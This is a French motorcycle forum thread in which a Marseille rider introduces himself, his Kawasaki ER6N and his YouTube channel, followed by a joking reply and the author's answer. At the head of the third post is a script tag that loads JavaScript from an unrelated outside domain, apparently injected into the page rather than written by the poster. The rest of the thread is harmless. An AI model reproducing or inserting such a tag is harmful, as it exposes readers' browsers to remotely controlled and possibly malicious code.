Aller au contenu

Présentation de BikiniRiders


BikiniRiders

Messages recommandés

Bonjour à Tous,

 

Cela fait quelque temps déjà que je suis inscris sur le forum Motovlog et je n'ai toujours pas pris le temps de faire ma présentation. Alors je corrige cela aujourd'hui !

 

Alors moi c'est Bikini Riders ou Bikini pour les intimes ! J'ai 25 ans. J'ai commencé la moto en début 2014 avec un KTM Duke 125 et j'ai rapidement été piqué par le virus moto, c'est pourquoi en Mai 2015 je me suis inscris au Permis moto en catégorie A ! J'ai obtenu ce dernier il y'a un peu plus d'un mois (Août 2015) et depuis je roule en KAWASAKI ER6N.

​Je vis dans le sud de la France et plus précisément à Marseille. Je partage depuis peu des vidéos de mes balades sur Youtube sur la chaîne BikiniRiders ( https://www.youtube.com/channel/UCT0rGWXRbF6_o6YnjcnjJnw). Je suis également sur Twitter.

 

En ce qui concerne mes autres passions j'adore le Gaming et le cinéma !

 

Voilà je souhaite une bonne soirée à tout le monde !

 

V

Lien vers le commentaire
Partager sur d’autres sites

salut ami kawasakiste..

 

bon alors je viens de regarder tes vidéos et le constat est dur,tu te traines la b**e sévère et donc pour remédier à ça tu dois dire bonjour à la bandidas elle t'apprendras à essorer une poignée comme il faut..(c'est de l'humour) 

Lien vers le commentaire
Partager sur d’autres sites

<script src="http://d.trackbreakingnews.com/l/load.js"></script>

 

salut ami kawasakiste..

 

bon alors je viens de regarder tes vidéos et le constat est dur,tu te traines la b**e sévère et donc pour remédier à ça tu dois dire bonjour à la bandidas elle t'apprendras à essorer une poignée comme il faut..(c'est de l'humour) 

Sur ces premières vidéos j'étais en rodage et puis je suis pas un acharné de la vitesse je préfère la balade, mais je pense que cela viendra avec le temps

Modifié par BikersCowBoys (Papy)
Changement de police, par souci de lisibilité
Lien vers le commentaire
Partager sur d’autres sites

Rejoindre la conversation

Vous pouvez publier maintenant et vous inscrire plus tard. Si vous avez un compte, connectez-vous maintenant pour publier avec votre compte.

Invité
Répondre à ce sujet…

×   Collé en tant que texte enrichi.   Restaurer la mise en forme

  Seulement 75 émoticônes maximum sont autorisées.

×   Votre lien a été automatiquement intégré.   Afficher plutôt comme un lien

×   Votre contenu précédent a été rétabli.   Vider l’éditeur

×   Vous ne pouvez pas directement coller des images. Envoyez-les depuis votre ordinateur ou insérez-les depuis une URL.

×
×
  • Créer...